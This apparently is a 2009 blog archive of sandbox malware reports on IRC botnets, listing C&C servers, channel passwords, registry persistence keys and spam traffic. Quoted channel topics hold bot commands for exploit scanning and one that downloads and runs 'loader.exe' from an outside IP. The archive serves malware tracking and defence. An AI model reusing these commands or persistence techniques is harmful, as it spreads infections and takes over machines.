Month: November 2009

85.17.138.130

Remote Host Port Number192.168.88.2 80 85.17.138.130 81 NICK xx[USA|XP]5722214PONG :index.htmlUSER oo oo oo :bbJOIN #.ooo Registry Modifications The following Registry Keys were created:HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONSHKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS000HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMacrovisionsHKEY_CURRENT_USERSoftwareMacrovisionsThe newly created Registry Values are:[HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS000]Service = “Macrovisions”Legacy = 0x00000001ConfigFlags = 0x00000000Class = “LegacyDriver”ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”DeviceDesc = “Macrovisions”[HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS]NextInstance = 0x00000001[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMacrovisions]DisplayName = “Macrovisions”ImagePath = “??%Temp%71863.sys”Type = 0x00000001Start = 0x00000003 Memory Modifications There was a

iik.for5love.ru(big ruski botnet)

Host Name IP Addressdell-d3e62f7e26 10.1.12.2iik.for5love.ru 195.190.13.187ik.whytakebi.com 218.61.22.10hot.jatajoo.ru hot.jatajoo.ru 195.190.13.187Download URLshttp://195.190.13.187/hot.php (iik.for5love.ru)http://195.190.13.187/hot.php (iik.for5love.ru)http://195.190.13.187/hot.php (iik.for5love.ru) * C&C Server: 195.190.13.187:7272 * Server Password: * Username: SP3-152 * Nickname: [N00_DEU_XP_1314922]_CHAR(0x08)_รค@ * Channel: (Password: ) * Channeltopic: * C&C Server: 218.61.22.10:7272 * Server Password: * Username: SP3-686 * Nickname: [00_DEU_XP_1861146] * Channel: #nit (Password: open) * Channeltopic: :.asc -S|.http http://rapidshare.com/files/314264722/re|.advscan

trbotnet.sytes.net(irc botnet)

Host Name IP Address dell-d3e62f7e26 10.1.13.2 trbotnet.sytes.net 85.153.30.14 * C&C Server: 85.153.30.14:6667 * Server Password: * Username: rciahpk * Nickname: [DEU|XP|772697] * Channel: #son (Password: botnetim) * Channeltopic: :.msn seen foto? hxxp://www.travestiniz.co.cc/images.php?id= |.msn.email hxxp://www.travestiniz.co.cc/images.php?id= |.p2p |.yims Topic By: [ Load ]

91.207.6.166(16k botnet)

91.207.6.166 : 154491.207.6.166:3838 chanel=##F## Now talking in ##F##Topic On: [##F## ] [ .asc -S|.http http://rapidshare.com/files/313278869/hus|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://78.159.127.254/del/loader.exe C:start.exe 1 ]Topic By: [ ok ]Modes On: [ ##F## ]

gt10.smo7he.com(mIRC bots hosted in China Beijing Chinanet Jiangsu Province Network)

Host Name IP Address gt10.smo7he.com 61.147.67.177 Opened listening TCP connection on port: 18631 Opened listening TCP connection on port: 113 * C&C Server: 61.147.67.177:6161 * Server Password: * Username: laMer * Nickname: XPMdv4E * Channel: #kwt-team (Password: #191#) * Channeltopic: hosting infos: http://whois.domaintools.com/61.147.67.177

ana.smo7he.net

Host Name IP Addressana.smo7he.net 95.128.242.245dell-d3e62f7e26 10.1.14.2alkeichah.com alkeichah.com 72.35.84.6u1.k129129.com UDP ConnectionsRemote IP Address: 95.128.242.245 Port: 1975Send Datagram: packet(s) of size 7Send Datagram: 2 packet(s) of size 3Send Datagram: packet(s) of size 49Send Datagram: packet(s) of size 58Send Datagram: packet(s) of size 1Recv Datagram: 6329 packet(s) of size 0Recv Datagram: packet(s) of size 8Recv Datagram: 2 packet(s)

apolo.c-13.puc.ul

Remote Host Port Number66.252.5.47 700072.35.84.6 80 * The data identified by the following URL was then requested from the remote web server: o http://alkeichah.com/881.exe NICK jcljatvxJOIN #usb trb50QUIT gettin new bin.NICK dpzgprmiUSER dpzgprmi * 0 :COMPUTERNAMEMODE dpzgprmi +ixUSER jcljatvx * 0 :COMPUTERNAMEMODE jcljatvx +ix Other details * The following port was open in the system:

mjf.no-ip.in

Remote Host Port Number72.184.196.76 6667 NICK XP|00|USA|SP2|4653USER jddgw 0 0 :XP|00|USA|SP2|4653USERHOST XP|00|USA|SP2|4653MODE XP|00|USA|SP2|4653 +x+iBJOIN #eckoPRIVMSG #ecko :12Password accepted12Type commandlist12[PSTORE]: Starting Pstore.12[PSTORE]: Pstore Started.PONG :1F6819DC Other details * The following ports were open in the system: Port Protocol Process113 TCP msconfig.exe (%System%msconfig.exe)1052 TCP msconfig.exe (%System%msconfig.exe) Registry Modifications * The following Registry Keys were created: o [pathname

xdetras.dyndns.info

Host Name IP Addressdell-d3e62f7e26 10.1.2.2xdetras.dyndns.info 109.123.66.112 * C&C Server: 109.123.66.112:6667 * Server Password: * Username: XP-5750 * Nickname: [DEU|00|P|03462] * Channel: #nuevos# (Password: mariano) * Channeltopic: : Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “winlogin” = winlogin.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “winlogin” = winlogin.exeHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:1.exe” = c:1.exe:*:Enabled:winloginHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active”

bnetnew.helohmar.com

bnetnew.helohmar.com 98.126.18.10Outgoing connection to remote server: bnetnew.helohmar.com TCP port 8800SMTP: 65.55.37.88:25 * SMTP: 74.6.136.65:25 * Username / Password: / SMTP: 65.55.92.152:25SMTP: 65.55.37.104:25SMTP: 65.54.188.72:25SMTP: 65.55.92.152:25SMTP: 65.54.188.110:25 * SMTP: 209.191.88.254:25 * Username / Password: / Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeHKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Tjmm71” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeReads HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon